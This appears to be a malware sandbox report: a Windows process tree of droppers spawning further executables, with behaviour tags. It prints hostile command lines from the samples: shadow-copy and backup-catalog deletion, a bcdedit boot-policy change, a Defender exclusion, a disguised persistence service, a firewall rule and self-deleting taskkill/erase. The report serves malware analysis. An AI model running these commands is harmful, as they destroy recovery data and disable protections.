                                                                                                                                                          C:\Users\Admin\Documents\RRTnuC5h5CrQRWtmmCjvr05t.exe
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5988
                                                                                                                                                        • C:\Users\Admin\Documents\iPbrc5a99ehuaoiO41oQaBKT.exe
                                                                                                                                                          "C:\Users\Admin\Documents\iPbrc5a99ehuaoiO41oQaBKT.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:6988
                                                                                                                                                          • C:\Users\Admin\Documents\RLM2pGDqdVzxJ4dR592m4c6W.exe
                                                                                                                                                            "C:\Users\Admin\Documents\RLM2pGDqdVzxJ4dR592m4c6W.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            PID:7080
                                                                                                                                                          • C:\Users\Admin\Documents\byO9PM3l7D65StvBntA7_SLe.exe
                                                                                                                                                            "C:\Users\Admin\Documents\byO9PM3l7D65StvBntA7_SLe.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:6952
                                                                                                                                                            • C:\Users\Admin\Documents\byO9PM3l7D65StvBntA7_SLe.exe
                                                                                                                                                              "C:\Users\Admin\Documents\byO9PM3l7D65StvBntA7_SLe.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:7372
                                                                                                                                                          • C:\Users\Admin\Documents\2DiL_9y0uJnQvt5opobm8Ras.exe
                                                                                                                                                            "C:\Users\Admin\Documents\2DiL_9y0uJnQvt5opobm8Ras.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:6872
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5862323.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5862323.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:7924
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1098642.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1098642.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                  PID:7948
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5696754.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5696754.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:7984
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4972697.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4972697.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:8084
                                                                                                                                                                  • C:\Users\Admin\Documents\UVJI_VbWXUZSnc_gqPENOddk.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\UVJI_VbWXUZSnc_gqPENOddk.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5200
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5581791927.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:7572
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5581791927.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5581791927.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:7748
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3011915536.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:9148
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3011915536.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\3011915536.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:8776
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "UVJI_VbWXUZSnc_gqPENOddk.exe" /f & erase "C:\Users\Admin\Documents\UVJI_VbWXUZSnc_gqPENOddk.exe" & exit
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:6928
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    taskkill /im "UVJI_VbWXUZSnc_gqPENOddk.exe" /f
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:7336
                                                                                                                                                                              • C:\Users\Admin\Documents\K_6bu8LzLCPvtNZARoaNxg26.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\K_6bu8LzLCPvtNZARoaNxg26.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                PID:6192
                                                                                                                                                                              • C:\Users\Admin\Documents\0Zt8PvaZowNnPT5GN2ejgmg7.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\0Zt8PvaZowNnPT5GN2ejgmg7.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:6288
                                                                                                                                                                                  • C:\Users\Admin\Documents\0Zt8PvaZowNnPT5GN2ejgmg7.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\0Zt8PvaZowNnPT5GN2ejgmg7.exe" -q
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3176
                                                                                                                                                                                  • C:\Users\Admin\Documents\d5OJBDI4FX7IRL54Msz_m746.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\d5OJBDI4FX7IRL54Msz_m746.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:6520
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 392
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:7912
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 372
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:7320
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 360
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:7820
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 624
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:6920
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6520 -s 660
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:4920
                                                                                                                                                                                    • C:\Users\Admin\Documents\CtIRf6fXwqUiLpeZSffsmrwh.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\CtIRf6fXwqUiLpeZSffsmrwh.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6356
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-B60Q2.tmp\CtIRf6fXwqUiLpeZSffsmrwh.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-B60Q2.tmp\CtIRf6fXwqUiLpeZSffsmrwh.tmp" /SL5="$20466,138429,56832,C:\Users\Admin\Documents\CtIRf6fXwqUiLpeZSffsmrwh.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                          PID:2308
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-81RBG.tmp\Setup.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-81RBG.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:7872
                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:7048
                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586627 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:6588
                                                                                                                                                                                            • C:\Users\Admin\Documents\B20uyVSdzNRlVdyjsix5u9pB.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\B20uyVSdzNRlVdyjsix5u9pB.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5112
                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\B20UYV~1.DLL,s C:\Users\Admin\DOCUME~1\B20UYV~1.EXE
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:8072
                                                                                                                                                                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\B20UYV~1.DLL,NiQSRjdISTc=
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:5412
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\B20UYV~1.DLL
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:8688
                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:5688
                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:5568
                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:5608
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\7107036.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\7107036.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:4968
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3486749.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3486749.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:5772
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3207818.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3207818.exe"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:3508
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5188006.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5188006.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:6152
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7945083.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7945083.exe"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                              PID:1224
                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:5520
                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        PID:5300
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:5352
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-T5TJU.tmp\WEATHER Manager.tmp
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-T5TJU.tmp\WEATHER Manager.tmp" /SL5="$1038C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5800
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-UQDLG.tmp\Setup.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-UQDLG.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                            PID:4816
                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-UQDLG.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-UQDLG.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586627 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5256
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-89IVK.tmp\MediaBurner2.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-89IVK.tmp\MediaBurner2.tmp" /SL5="$203B2,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:5172
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-08CUJ.tmp\ultradumnibour.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-08CUJ.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:5144
                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                  dw20.exe -x -s 2068
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:7504
                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                PID:388
                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 2AA77EB20AE39457E8EE73BCFA02C4FD C
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:2304
                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 8DA386577CA1253ECCE0AD9EA76449BA
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:8352
                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 1E090F598773ED4956DAA221D77246F3 C
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:8568
                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 86631BE24861A630049AF9481819AD49 C
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:7580
                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                      PID:8604
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:8624
                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                        PID:8140
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:8008
                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:3656
                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5c60d150-9128-704e-8f16-955b55e92a3e}\oemvista.inf" "9" "4d14a44ff" "000000000000009C" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1940
                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4288
                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4788
                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5200
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\77A4.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\77A4.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:9128
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\835D.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\835D.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:6476
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BCDD.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BCDD.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:7400
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C887.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C887.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:6720
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sxzkawzq\
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:7644
                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:5140
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hlokwfcy.exe" C:\Windows\SysWOW64\sxzkawzq\
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:7488
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create sxzkawzq binPath= "C:\Windows\SysWOW64\sxzkawzq\hlokwfcy.exe /d\"C:\Users\Admin\AppData\Local\Temp\C887.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:3204
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description sxzkawzq "wifi internet conection"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:8140
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start sxzkawzq
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:8672
                                                                                                                                                                                                                                                      • C:\Users\Admin\lyukszue.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\lyukszue.exe" /d"C:\Users\Admin\AppData\Local\Temp\C887.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:4288
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uhhfefss.exe" C:\Windows\SysWOW64\sxzkawzq\
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:4876
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" config sxzkawzq binPath= "C:\Windows\SysWOW64\sxzkawzq\uhhfefss.exe /d\"C:\Users\Admin\lyukszue.exe\""
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5848
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" start sxzkawzq
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:7488
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:7684
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5336.bat" "
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:9224
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:9160
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D97F.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\D97F.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4080
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F4E8.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F4E8.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:7240
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1FB2.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1FB2.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:6380
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2A52.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2A52.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:6956
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                              notepad.exe
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:8152
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:8948
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:9612
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:9604
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                          wmic shadowcopy delete
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:8944
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                            vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                                                                                            PID:10260
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:9596
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                              vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                                                                                                              PID:9976
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:9588
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                                                              3⤵
